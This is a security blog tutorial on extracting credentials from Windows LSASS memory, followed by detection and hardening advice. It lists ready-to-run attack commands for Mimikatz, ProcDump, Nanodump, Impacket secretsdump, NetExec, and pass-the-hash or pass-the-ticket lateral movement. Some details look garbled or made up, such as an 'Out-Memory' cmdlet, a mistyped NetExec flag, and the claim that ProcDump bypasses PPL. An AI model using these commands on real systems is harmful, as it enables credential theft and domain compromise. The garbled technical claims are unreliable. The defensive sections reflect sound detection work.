Listen to this Post

Introduction:
The Local Security Authority Subsystem Service (LSASS) is the crown jewel of Windows authentication, responsible for enforcing security policies, handling logons, and caching credentials – including NTLM hashes, Kerberos tickets, DPAPI keys, and even plaintext passwords. Attackers and penetration testers target LSASS post-exploitation to extract these secrets, enabling lateral movement and privilege escalation across domains.
Learning Objectives:
- Understand why LSASS is a high-value post-exploitation target and what credentials it stores.
- Execute credential dumping attacks using Mimikatz, ProcDump, and pypykatz.
- Detect and mitigate LSASS dumping with PPL, Credential Guard, Sysmon, and SIEM rules.
You Should Know:
- Why LSASS Is a Treasure Trove: Credentials in Memory
LSASS caches authentication material to enable single sign-on and seamless network access. After a user logs on, NTLM hashes, Kerberos TGTs/TGSs, DPAPI master keys, AES keys, and sometimes cleartext passwords remain in its process memory. Dumping LSASS allows an attacker to impersonate users without cracking passwords.
Step‑by‑step guide to verifying LSASS memory contents (legitimate AD audit):
– Use Task Manager → Details → Right‑click LSASS.EXE → Create dump file (requires Admin).
– Analyze with pypykatz on Linux:
pypykatz lsa minidump lsass.dmp
– For live memory reading (Red Team only):
PowerShell as admin Get-Process lsass | Select-Object -ExpandProperty Modules
2. Dumping Credentials with Mimikatz: The Classic Attack
Mimikatz’s `sekurlsa::logonpasswords` reads LSASS memory to extract all logon sessions. Defenders must understand this to build effective mitigations.
Step‑by‑step guide to using Mimikatz (authorized testing only):
1. Download Mimikatz from official GitHub.
2. Run as administrator:
mimikatz.exe privilege::debug sekurlsa::logonpasswords
3. Output includes NTLM hashes, Kerberos tickets, and potentially plaintext passwords.
4. Dump only specific data:
sekurlsa::tickets /export sekurlsa::dpapi
Mitigation: Enable RunAsPPL (Protected Process Light) to block unauthorized access to LSASS.
3. Bypassing PPL with ProcDump and Nanodump
When LSASS is protected as a PPL, Mimikatz fails. Attackers use Sysinternals ProcDump or the tailored Nanodump to create a memory dump without killing LSASS.
Step‑by‑step guide to dumping LSASS from a PPL‑protected system:
– Using ProcDump (legitimate troubleshooting):
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
– Transfer the dump to an attacker machine and run Mimikatz offline:
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" exit
– Nanodump (stealthier) uses indirect syscalls and custom callbacks:
Compile and inject nanodump into remote process nanodump.exe --dump --write lsass.dmp
4. Linux‑Based Attacks: Impacket secretsdump and NetExec
Attackers often pivot from Linux to dump LSASS remotely using SMB, RPC, or raw registry operations.
Step‑by‑step guide to remote credential dumping:
- Use Impacket’s secretsdump.py (requires admin credentials):
secretsdump.py domain/user:password@target-ip -just-dc
- Extract NTLM hashes from NTDS.dit (domain controller):
secretsdump.py -ntds ntds.dit -system SYSTEM.save LOCAL
- NetExec (formerly CrackMapExec) automates LSASS remote dumping:
netexec smb target-ip -u user -p pass --lsas
- Remotely enable registry access and dump:
reg.py domain/user:password@target-ip get -keyName HKLM\SAM
5. Detecting LSASS Dumping with Sysmon and SIEM
Proactive detection stops credential theft. Sysmon event ID 10 (ProcessAccess) with `TargetImage` lsass.exe and `CallTrace` containing known dump tools is a strong indicator.
Step‑by‑step guide to detection rules:
- Install Sysmon with a configuration that logs LSASS access:
<ProcessAccess onmatch="include"> <TargetImage condition="end with">lsass.exe</TargetImage> <SourceImage condition="contains">mimikatz.exe</SourceImage> </ProcessAccess>
- Query Windows Security Event Log for event 4656 (handle to LSASS):
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4656} | Where-Object {$_.Message -like 'lsass.exe'} - SIEM rule example (Splunk):
index=windows EventCode=10 TargetImage=lsass.exe CallTrace=dbgcore.dll OR dbghelp.dll
- Enable PowerShell logging to detect LSASS dumping via `Get-Process lsass | Out-Memory` patterns.
- Hardening LSASS: Credential Guard, PPL, and ASR Rules
Mitigations include Windows Defender Credential Guard (virtualization‑based isolation of LSA secrets), RunAsPPL, and Attack Surface Reduction rules.
Step‑by‑step guide to hardening:
- Enable Credential Guard via Group Policy: Computer Configuration → Administrative Templates → System → Device Guard → Turn On Virtualization Based Security → set to “Enabled with Credential Guard”.
- Set LSASS to run as PPL (Windows 10+):
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL /t REG_DWORD /d 1 /f
- ASR rule to block LSASS credential dumping (GUID: 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2):
Add-MpPreference -AttackSurfaceReductionRules_Ids 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 -AttackSurfaceReductionRules_Actions Enabled
- Restrict debug privilege to protected processes: `gpedit.msc` → Computer Config → Windows Settings → Security Settings → Local Policies → User Rights Assignment → Debug programs (remove all non‑admin accounts).
7. Post‑Exploitation: Pass‑the‑Hash and Pass‑the‑Ticket from LSASS Dumps
Once credentials are extracted, attackers perform lateral movement without password cracking.
Step‑by‑step guide to pass‑the‑hash (PtH) and pass‑the‑ticket (PtT):
- PtH with Impacket:
wmiexec.py -hashes lm:ntlm domain/user@target-ip
- PtT with Mimikatz (after exporting Kerberos tickets):
kerberos::ptt ticket.kirbi
- Using Rubeus on Windows:
Rubeus.exe ptt /ticket:doIFD...
- Linux equivalent (Ticketer):
ticketer.py -nthash NTLM -domain-sid SID -domain domain.com user
What Undercode Say:
- LSASS is not invincible: Even with PPL and Credential Guard, misconfigurations or kernel drivers can bypass protections – defense in depth is mandatory.
- Detection over prevention: No single control blocks all dumping methods; focus on Sysmon Event 10 monitoring, LSASS process access auditing, and behavioral analytics (e.g., unusual `OpenProcess` calls).
- Offline analysis is key: Many advanced attacks dump LSASS to disk and exfiltrate – secure your memory dump storage and restrict `SeDebugPrivilege` to only trusted administrators.
- Linux tools are powerful: Red teams increasingly use Impacket and NetExec from Linux, bypassing Windows EDR hooks – cross‑platform detection rules must cover SMB and RPC telemetry.
Prediction:
As Microsoft increases LSASS protections (e.g., TPM‑bound LSA keys, full Arbitrary Code Guard), attackers will shift to alternative credential access techniques like Kerberos bronze bit, AD CS abuse, or cloud token theft. However, LSASS memory dumping will remain a primary attack vector for at least 2‑3 years due to legacy systems and misconfigured domain controllers. Expect widespread adoption of Credential Guard in Windows 12 enterprises, but also novel kernel‑level bypasses targeting virtualization‑based security. Blue teams must integrate LSASS health monitoring and automated memory dump analysis into their SOAR workflows.
▶️ Related Video (72% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Abelousova Credential – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


